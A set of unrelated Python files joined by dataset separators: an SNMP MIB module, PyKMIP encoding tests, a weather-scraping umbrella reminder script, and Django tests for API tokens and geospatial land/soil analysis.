# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ALVARION-SMI
# Produced by pysmi-0.3.4 at Mon Apr 29 17:06:07 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
IpAddress, Unsigned32, ObjectIdentity, TimeTicks, MibIdentifier, Integer32, ModuleIdentity, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Gauge32, NotificationType, Counter32, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Unsigned32", "ObjectIdentity", "TimeTicks", "MibIdentifier", "Integer32", "ModuleIdentity", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "Gauge32", "NotificationType", "Counter32", "Counter64", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
alvarionWireless = ModuleIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10))
if mibBuilder.loadTexts: alvarionWireless.setLastUpdated('200710310000Z')
if mibBuilder.loadTexts: alvarionWireless.setOrganization('Alvarion Ltd.')
alvarionProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 1))
if mibBuilder.loadTexts: alvarionProducts.setStatus('current')
alvarionExperiment = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 3))
if mibBuilder.loadTexts: alvarionExperiment.setStatus('current')
alvarionModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 4))
if mibBuilder.loadTexts: alvarionModules.setStatus('current')
alvarionMgmtV2 = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 5))
if mibBuilder.loadTexts: alvarionMgmtV2.setStatus('current')
variation = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 7))
if mibBuilder.loadTexts: variation.setStatus('current')
mibBuilder.exportSymbols("ALVARION-SMI", variation=variation, PYSNMP_MODULE_ID=alvarionWireless, alvarionProducts=alvarionProducts, alvarionWireless=alvarionWireless, alvarionModules=alvarionModules, alvarionMgmtV2=alvarionMgmtV2, alvarionExperiment=alvarionExperiment)
| StarcoderdataPython |
1622578 | #-*- coding:utf-8 -*-
__version__ = '0.1.0'
__author__ = '<NAME>, <NAME> 20.03.2019'
__status__ = 'dev' # options are: dev, test, prod
from ioproc.tools import action
from ioproc.logger import mainlogger
@action('general')
def printData(dmgr, config, params):
'''
simple debugging printing function. Prints all data in the data manager.
Does not have any parameters.
'''
for k, v in dmgr.items():
mainlogger.info(k+' = \n'+str(v))
@action('general')
def checkpoint(dmgr, config, params):
'''
Creates a checkpoint file in the current working directory with name
Cache_TAG while TAG is supplied by the action config.
:param tag: the tag for this checkpoint, this can never be "start"
'''
assert params['tag'] != 'start', 'checkpoints can not be named start'
dmgr.toCache(params['tag'])
mainlogger.info('set checkpoint "{}"'.format(params['tag']))
| StarcoderdataPython |
1705349 | # Copyright (c) 2015 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from kmip.core import attributes
from kmip.core import exceptions
from kmip.core import utils
class TestApplicationSpecificInformation(testtools.TestCase):
"""
A test suite for the ApplicationSpecificInformation class.
"""
def setUp(self):
super(TestApplicationSpecificInformation, self).setUp()
# This encoding was taken from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Namespace - ssl
# Application Data - www.example.com
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x28'
b'\x42\x00\x03\x07\x00\x00\x00\x03\x73\x73\x6C\x00\x00\x00\x00\x00'
b'\x42\x00\x02\x07\x00\x00\x00\x0F'
b'\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C\x65\x2E\x63\x6F\x6D\x00'
)
# This encoding was adapted from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Data - www.example.com
self.no_application_namespace_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x18'
b'\x42\x00\x02\x07\x00\x00\x00\x0F'
b'\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C\x65\x2E\x63\x6F\x6D\x00'
)
# This encoding was adapted from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Namespace - ssl
self.no_application_data_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x10'
b'\x42\x00\x03\x07\x00\x00\x00\x03\x73\x73\x6C\x00\x00\x00\x00\x00'
)
def tearDown(self):
super(TestApplicationSpecificInformation, self).tearDown()
def test_init(self):
"""
Test that an ApplicationSpecificInformation object can be constructed.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
self.assertIsNone(app_specific_info.application_data)
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="namespace",
application_data="data"
)
self.assertEqual("namespace", app_specific_info.application_namespace)
self.assertEqual("data", app_specific_info.application_data)
def test_invalid_application_namespace(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the application namespace of an ApplicationSpecificInformation object.
"""
kwargs = {"application_namespace": []}
self.assertRaisesRegex(
TypeError,
"The application namespace must be a string.",
attributes.ApplicationSpecificInformation,
**kwargs
)
args = (
attributes.ApplicationSpecificInformation(),
"application_namespace",
[]
)
self.assertRaisesRegex(
TypeError,
"The application namespace must be a string.",
setattr,
*args
)
def test_invalid_application_data(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the application data of an ApplicationSpecificInformation object.
"""
kwargs = {"application_data": []}
self.assertRaisesRegex(
TypeError,
"The application data must be a string.",
attributes.ApplicationSpecificInformation,
**kwargs
)
args = (
attributes.ApplicationSpecificInformation(),
"application_data",
[]
)
self.assertRaisesRegex(
TypeError,
"The application data must be a string.",
setattr,
*args
)
def test_read(self):
"""
Test that an ApplicationSpecificInformation object can be read from a
buffer.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
self.assertIsNone(app_specific_info.application_data)
app_specific_info.read(self.full_encoding)
self.assertEqual("ssl", app_specific_info.application_namespace)
self.assertEqual("www.example.com", app_specific_info.application_data)
def test_read_missing_application_namespace(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding of
an ApplicationSpecificInformation object with the application namespace
is missing from the encoding.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
args = (self.no_application_namespace_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The ApplicationSpecificInformation encoding is missing the "
"ApplicationNamespace field.",
app_specific_info.read,
*args
)
def test_read_missing_application_data(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding of
an ApplicationSpecificInformation object with the application data is
missing from the encoding.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_data)
args = (self.no_application_data_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The ApplicationSpecificInformation encoding is missing the "
"ApplicationData field.",
app_specific_info.read,
*args
)
def test_write(self):
"""
Test that an ApplicationSpecificInformation object can be written to a
buffer.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
buff = utils.BytearrayStream()
app_specific_info.write(buff)
self.assertEqual(len(self.full_encoding), len(buff))
self.assertEqual(str(self.full_encoding), str(buff))
def test_write_missing_application_namespace(self):
"""
Test that an InvalidField error is raised during the encoding of an
ApplicationSpecificInformation object when the object is missing the
application namespace field.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_data="www.example.com"
)
buff = utils.BytearrayStream()
args = (buff, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The ApplicationSpecificInformation object is missing the "
"ApplicationNamespace field.",
app_specific_info.write,
*args
)
def test_write_missing_application_data(self):
"""
Test that an InvalidField error is raised during the encoding of an
ApplicationSpecificInformation object when the object is missing the
application data field.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl"
)
buff = utils.BytearrayStream()
args = (buff, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The ApplicationSpecificInformation object is missing the "
"ApplicationData field.",
app_specific_info.write,
*args
)
def test_repr(self):
"""
Test that repr can be applied to an ApplicationSpecificInformation
object.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
args = [
"application_namespace='ssl'",
"application_data='www.example.com'"
]
self.assertEqual(
"ApplicationSpecificInformation({})".format(", ".join(args)),
repr(app_specific_info)
)
def test_str(self):
"""
Test that str can be applied to an ApplicationSpecificInformation
object.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
args = [
("application_namespace", "ssl"),
("application_data", "www.example.com")
]
value = "{}".format(
", ".join(['"{}": "{}"'.format(arg[0], arg[1]) for arg in args])
)
self.assertEqual(
"{" + value + "}",
str(app_specific_info)
)
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two ApplicationSpecificInformation objects with the same
data.
"""
a = attributes.ApplicationSpecificInformation()
b = attributes.ApplicationSpecificInformation()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
b = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_application_namespaces(self):
"""
Test that the equality/inequality operators return False/True when
comparing two ApplicationSpecificInformation objects with different
data.
"""
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace_1"
)
b = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace_2"
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_different_application_data(self):
"""
Test that the equality/inequality operators return False/True when
comparing two ApplicationSpecificInformation objects with different
data.
"""
a = attributes.ApplicationSpecificInformation(
application_data="test_data_1"
)
b = attributes.ApplicationSpecificInformation(
application_data="test_data_2"
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
comparing an ApplicationSpecificInformation object to a
non-ApplicationSpecificInformation object.
"""
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
| StarcoderdataPython |
3252688 | """Remember umbrella
Use :py:mod:`requests` to scrape data from http://weather.gov/.
Write a program that runs just before you wake up in the morning and checks
whether it’s raining that day. If so, have the program text you a reminder to pack
an umbrella before leaving the house.
"""
import requests, bs4, datetime
def get_weather(url_arg: str) -> str:
"""Get weather
Uses :py:mod:`requests` to download given weather page url, then uses :py:mod:`bs4` to get
the current weather data text.
Args:
url_arg: String containing url to specified city's http://weather.gov/ weather page.
Returns:
String with current weather data text.
"""
# Download url_arg and soupify
res = requests.get(url_arg)
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, 'lxml')
# Parse current weather from soup
weather_element = soup.select('.myforecast-current')
return weather_element[0].getText()
def remember_umbrella(weather_arg: str) -> bool:
"""Remember umbrella
Checks current weather data text from :meth:`get_weather` for keywords indicating rain.
Args:
weather_arg: String containing current weather text of specified city.
Returns:
True if any of the rain keywords are found, False otherwise.
"""
# Check weather_arg for rain
tokens = ['rain', 't-storms']
"""list: Strings of keywords that indicate rain."""
weather_arg = weather_arg.lower() # To match tokens' case
for token in tokens:
if token in weather_arg:
return True
return False
def check_time(time_arg: datetime.time) -> bool:
"""Check time
Checks if given time is after current time as given by :meth:`datetime.datetime.now`.
Args:
time_arg: :class:`datetime.time` object to compare with current time.
Returns:
True if given time is after current time.
"""
# Check for time_arg
time_now = datetime.datetime.now().time()
if time_now < time_arg:
print(f'RuntimeError: can\'t run until {time_arg}')
return False
return True
def main():
import time
from books.AutomateTheBoringStuff.Ch16.P5_textMyself import textmyself
# Wait for wake_time
sleep_time = datetime.timedelta(minutes=5)
wake_time = datetime.time(hour=5)
while not check_time(wake_time):
time.sleep(sleep_time.total_seconds())
# Get current weather
url = 'https://forecast.weather.gov/MapClick.php?lat=30.26759000000004&lon=-97.74298999999996'
weather = get_weather(url)
# If raining, text cellphone
if remember_umbrella(weather):
message = f'Bring an umbrella, there\'s {weather.lower()}'
textmyself(message)
# If run directly (instead of imported), run main()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3331179 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import json
from django.test import (Client,
TestCase,
LiveServerTestCase)
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.contrib.gis.geos import GEOSGeometry
from apps.geoprocessing_api import (tasks, calcs)
class ExerciseManageApiToken(LiveServerTestCase):
TOKEN_URL = 'http://localhost:8081/api/token/'
def setUp(self):
User.objects.create_user(username='bob', email='<EMAIL>',
password='<PASSWORD>')
User.objects.create_user(username='nono', email='<EMAIL>',
password='<PASSWORD>')
def get_logged_in_session(self, username, password):
c = Client()
c.login(username=username,
password=password)
return c
def get_api_token(self, username='', password='',
session=None, regenerate=False):
if not session:
session = Client()
payload = {}
if username or password:
payload.update({'username': username,
'password': password})
if regenerate:
payload.update({'regenerate': True})
return session.post(self.TOKEN_URL,
data=payload)
def test_get_api_token_no_credentials_returns_400(self):
response = self.get_api_token()
self.assertEqual(response.status_code, 403,
'Incorrect server response. Expected 403 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_bad_body_credentials_returns_400(self):
response = self.get_api_token('bad', 'bad')
self.assertEqual(response.status_code, 400,
'Incorrect server response. Expected 400 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_good_body_credentials_returns_200(self):
response = self.get_api_token('bob', '<PASSWORD>')
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_good_session_credentials_returns_200(self):
s = self.get_logged_in_session('bob', 'bob')
response = self.get_api_token(session=s)
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_uses_body_credentials_over_session(self):
bob_user = User.objects.get(username='bob')
bob_token = Token.objects.get(user=bob_user)
s = self.get_logged_in_session('nono', 'nono')
response = self.get_api_token('bob', 'bob', s)
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
response_token = json.loads(response.content)['token']
self.assertEqual(str(response_token), str(bob_token),
""" Incorrect server response.
Expected to get token for user
given in request body %s, but got %s
""" % (bob_token, response_token))
def test_get_api_token_doesnt_regenerate_token(self):
bob_user = User.objects.get(username='bob')
bob_token_before = Token.objects.get(user=bob_user)
response = self.get_api_token('bob', 'bob')
response_token = json.loads(response.content)['token']
self.assertEqual(str(response_token), str(bob_token_before),
""" Expected request token to be the same
as token before the request was made
(%s), but got %s
""" % (bob_token_before, response_token))
bob_token_after = Token.objects.get(user=bob_user)
self.assertEqual(bob_token_before, bob_token_after,
""" Expected token to be the same
as it was before the request was made
(%s), but got %s
""" % (bob_token_before, bob_token_after))
def test_get_api_token_can_regenerate_token(self):
bob_user = User.objects.get(username='bob')
old_bob_token = Token.objects.get(user=bob_user)
response = self.get_api_token('bob', 'bob', regenerate=True)
response_token = json.loads(response.content)['token']
new_bob_token = Token.objects.get(user=bob_user)
self.assertEqual(str(response_token), str(new_bob_token),
""" Expected regenerated response token to
be the same as stored token (%s), but got %s
""" % (new_bob_token, response_token))
self.assertTrue(old_bob_token is not new_bob_token,
""" Expected new token to be created
but token is the same""")
class ExerciseAnalyze(TestCase):
def test_survey_land(self):
self.maxDiff = None
# NLCD Histogram of Little Neshaminy HUC-12
histogram = {
'List(11)': 39,
'List(21)': 40558,
'List(22)': 25230,
'List(23)': 10976,
'List(24)': 3793,
'List(31)': 364,
'List(41)': 19218,
'List(42)': 153,
'List(43)': 329,
'List(52)': 3309,
'List(71)': 684,
'List(81)': 8922,
'List(82)': 6345,
'List(90)': 3940,
'List(95)': 112,
}
expected = {
"survey": {
"displayName": "Land",
"name": "land",
"categories": [
{
"area": 329,
"code": "mixed_forest",
"coverage": 0.002653825057270997,
"nlcd": 43,
"type": "Mixed Forest"
},
{
"area": 684,
"code": "grassland",
"coverage": 0.005517374891104443,
"nlcd": 71,
"type": "Grassland/Herbaceous"
},
{
"area": 19218,
"code": "deciduous_forest",
"coverage": 0.1550188752298906,
"nlcd": 41,
"type": "Deciduous Forest"
},
{
"area": 153,
"code": "evergreen_forest",
"coverage": 0.001234149646694415,
"nlcd": 42,
"type": "Evergreen Forest"
},
{
"area": 39,
"code": "open_water",
"coverage": 0.00031458716484367437,
"nlcd": 11,
"type": "Open Water"
},
{
"area": 0,
"code": "perennial_ice",
"coverage": 0,
"nlcd": 12,
"type": "Perennial Ice/Snow"
},
{
"area": 8922,
"code": "pasture",
"coverage": 0.07196786371116058,
"nlcd": 81,
"type": "Pasture/Hay"
},
{
"area": 6345,
"code": "cultivated_crops",
"coverage": 0.051180911818797796,
"nlcd": 82,
"type": "Cultivated Crops"
},
{
"area": 3309,
"code": "shrub",
"coverage": 0.026691510986351755,
"nlcd": 52,
"type": "Shrub/Scrub"
},
{
"area": 40558,
"code": "developed_open",
"coverage": 0.32715451876230117,
"nlcd": 21,
"type": "Developed, Open Space"
},
{
"area": 25230,
"code": "developed_low",
"coverage": 0.20351369664117705,
"nlcd": 22,
"type": "Developed, Low Intensity"
},
{
"area": 10976,
"code": "developed_med",
"coverage": 0.0885361210595941,
"nlcd": 23,
"type": "Developed, Medium Intensity"
},
{
"area": 3793,
"code": "developed_high",
"coverage": 0.030595618365437355,
"nlcd": 24,
"type": "Developed, High Intensity"
},
{
"area": 3940,
"code": "woody_wetlands",
"coverage": 0.0317813699867712,
"nlcd": 90,
"type": "Woody Wetlands"
},
{
"area": 112,
"code": "herbaceous_wetlands",
"coverage": 0.000903429806730552,
"nlcd": 95,
"type": "Emergent Herbaceous Wetlands"
},
{
"area": 364,
"code": "barren_land",
"coverage": 0.0029361468718742943,
"nlcd": 31,
"type": "Barren Land (Rock/Sand/Clay)"
}
]
}
}
actual = tasks.analyze_nlcd(histogram)
self.assertEqual(actual, expected)
def test_survey_soil(self):
self.maxDiff = None
# Soil histogram of Little Neshaminy HUC-12
histogram = {
'List(-2147483648)': 47430,
'List(1)': 2905,
'List(2)': 14165,
'List(3)': 23288,
'List(4)': 23109,
'List(6)': 338,
'List(7)': 12737,
}
expected = {
"survey": {
"displayName": "Soil",
"name": "soil",
"categories": [
{
"area": 2905,
"code": "a",
"coverage": 0.023432710612073693,
"type": "A - High Infiltration"
},
{
"area": 14165,
"code": "b",
"coverage": 0.11425967153873455,
"type": "B - Moderate Infiltration"
},
{
"area": 70718,
"code": "c",
"coverage": 0.5704352595747427,
"type": "C - Slow Infiltration"
},
{
"area": 23109,
"code": "d",
"coverage": 0.1864049946762172,
"type": "D - Very Slow Infiltration"
},
{
"area": 0,
"code": "ad",
"coverage": 0,
"type": "A/D - High/Very Slow Infiltration"
},
{
"area": 338,
"code": "bd",
"coverage": 0.0027264220953118444,
"type": "B/D - Medium/Very Slow Infiltration"
},
{
"area": 12737,
"code": "cd",
"coverage": 0.10274094150292001,
"type": "C/D - Medium/Very Slow Infiltration"
}
],
}
}
actual = tasks.analyze_soil(histogram)
self.assertEqual(actual, expected)
class ExerciseCatchmentIntersectsAOI(TestCase):
def test_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-75.27900695800781,
39.891925022904516
],
[
-75.26608943939209,
39.891925022904516
],
[
-75.26608943939209,
39.90173657727282
],
[
-75.27900695800781,
39.90173657727282
],
[
-75.27900695800781,
39.891925022904516
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.28535842895508,
39.898279646242635
],
[
-75.27896404266357,
39.898279646242635
],
[
-75.27896404266357,
39.90305345750681
],
[
-75.28535842895508,
39.90305345750681
],
[
-75.28535842895508,
39.898279646242635
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.26849269866943,
39.890838422106924
],
[
-75.26244163513184,
39.890838422106924
],
[
-75.26244163513184,
39.89498716884207
],
[
-75.26849269866943,
39.89498716884207
],
[
-75.26849269866943,
39.890838422106924
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-75.27368545532225,
39.89722607068418
],
[
-75.26887893676758,
39.89722607068418
],
[
-75.26887893676758,
39.90124274066003
],
[
-75.27368545532225,
39.90124274066003
],
[
-75.27368545532225,
39.89722607068418
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_hundred_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-94.64584350585938,
38.96154447940714
],
[
-94.53460693359374,
38.96154447940714
],
[
-94.53460693359374,
39.05225165582583
],
[
-94.64584350585938,
39.05225165582583
],
[
-94.64584350585938,
38.96154447940714
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.53563690185547,
39.03065255999985
],
[
-94.49203491210938,
39.03065255999985
],
[
-94.49203491210938,
39.07864158248181
],
[
-94.53563690185547,
39.07864158248181
],
[
-94.53563690185547,
39.03065255999985
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.55554962158203,
38.92870117926206
],
[
-94.49581146240233,
38.92870117926206
],
[
-94.49581146240233,
38.9858333874019
],
[
-94.55554962158203,
38.9858333874019
],
[
-94.55554962158203,
38.92870117926206
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-94.62284088134766,
38.997841307500714
],
[
-94.58576202392578,
38.997841307500714
],
[
-94.58576202392578,
39.031452644263084
],
[
-94.62284088134766,
39.031452644263084
],
[
-94.62284088134766,
38.997841307500714
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_thousand_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-96.1083984375,
41.12074559016745
],
[
-95.7513427734375,
41.12074559016745
],
[
-95.7513427734375,
41.39741506646461
],
[
-96.1083984375,
41.39741506646461
],
[
-96.1083984375,
41.12074559016745
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-96.18255615234375,
41.24064190269475
],
[
-96.10736846923828,
41.24064190269475
],
[
-96.10736846923828,
41.2765163855178
],
[
-96.18255615234375,
41.2765163855178
],
[
-96.18255615234375,
41.24064190269475
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-95.8172607421875,
41.0607151401866
],
[
-95.68405151367188,
41.0607151401866
],
[
-95.68405151367188,
41.160046141686905
],
[
-95.8172607421875,
41.160046141686905
],
[
-95.8172607421875,
41.0607151401866
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-95.93811035156249,
41.306697618181865
],
[
-95.82550048828125,
41.306697618181865
],
[
-95.82550048828125,
41.3757780692323
],
[
-95.93811035156249,
41.3757780692323
],
[
-95.93811035156249,
41.306697618181865
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_ten_thousand_sq_km_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-115.01586914062499,
43.866218006556394
],
[
-113.719482421875,
43.866218006556394
],
[
-113.719482421875,
44.89479576469787
],
[
-115.01586914062499,
44.89479576469787
],
[
-115.01586914062499,
43.866218006556394
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-115.23559570312499,
44.380802793578475
],
[
-115.00488281250001,
44.380802793578475
],
[
-115.00488281250001,
44.52001001133986
],
[
-115.23559570312499,
44.52001001133986
],
[
-115.23559570312499,
44.380802793578475
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-115.17791748046875,
43.775060351224695
],
[
-114.949951171875,
43.775060351224695
],
[
-114.949951171875,
44.09350315285847
],
[
-115.17791748046875,
44.09350315285847
],
[
-115.17791748046875,
43.775060351224695
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-114.43359375,
44.262904233655384
],
[
-114.06829833984375,
44.262904233655384
],
[
-114.06829833984375,
44.61393394730626
],
[
-114.43359375,
44.61393394730626
],
[
-114.43359375,
44.262904233655384
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_huge_aoi_tiny_catchments(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-85.166015625,
39.470125122358176
],
[
-82.44140625,
39.470125122358176
],
[
-82.44140625,
42.94033923363181
],
[
-85.166015625,
42.94033923363181
],
[
-85.166015625,
39.470125122358176
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-85.440673828125,
42.68243539838623
],
[
-85.15502929687499,
42.68243539838623
],
[
-85.15502929687499,
42.79540065303723
],
[
-85.440673828125,
42.79540065303723
],
[
-85.440673828125,
42.68243539838623
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-82.63916015625,
41.94314874732696
],
[
-82.265625,
41.94314874732696
],
[
-82.265625,
42.06560675405716
],
[
-82.63916015625,
42.06560675405716
],
[
-82.63916015625,
41.94314874732696
]
]
]
}
contained_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-83.671875,
39.65645604812829
],
[
-83.34228515625,
39.65645604812829
],
[
-83.34228515625,
39.9434364619742
],
[
-83.671875,
39.9434364619742
],
[
-83.671875,
39.65645604812829
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
contained_catchment))
def test_huge_catchments_tiny_aoi(self):
aoi = GEOSGeometry(json.dumps({
"type": "Polygon",
"coordinates": [
[
[
-86.1189079284668,
30.712618489700507
],
[
-86.11066818237303,
30.712618489700507
],
[
-86.11066818237303,
30.719554693895116
],
[
-86.1189079284668,
30.719554693895116
],
[
-86.1189079284668,
30.712618489700507
]
]
]
}), srid=4326)
reprojected_aoi = aoi.transform(5070, clone=True)
abutting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.11856460571288,
30.71940712027702
],
[
-86.12113952636719,
30.88395860861961
],
[
-86.38206481933594,
30.884547891921986
],
[
-86.37931823730467,
30.71586528568626
],
[
-86.11856460571288,
30.71940712027702
]
]
]
}
intersecting_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.13006591796874,
30.59832078510471
],
[
-85.9075927734375,
30.59832078510471
],
[
-85.9075927734375,
30.714094319607913
],
[
-86.13006591796874,
30.714094319607913
],
[
-86.13006591796874,
30.59832078510471
]
]
]
}
containing_catchment = {
"type": "Polygon",
"coordinates": [
[
[
-86.22550964355469,
30.627277165616874
],
[
-86.0394287109375,
30.627277165616874
],
[
-86.0394287109375,
30.80967992229391
],
[
-86.22550964355469,
30.80967992229391
],
[
-86.22550964355469,
30.627277165616874
]
]
]
}
self.assertFalse(calcs.catchment_intersects_aoi(reprojected_aoi,
abutting_catchment))
